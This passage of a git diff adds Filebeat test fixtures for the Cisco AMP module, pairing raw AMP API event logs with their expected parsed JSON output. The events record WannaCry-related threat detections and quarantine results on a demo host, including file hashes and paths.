"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782274", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 368000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + 
"file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 99457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782273", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 134000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": 
"user@testdomain.com", + "input.type": "log", + "log.offset": 100730, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782272", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 102003, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782271", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103275, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782270", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104547, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log new file mode 100644 index 00000000000..6ccff00d38b --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log 
@@ -0,0 +1,53 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
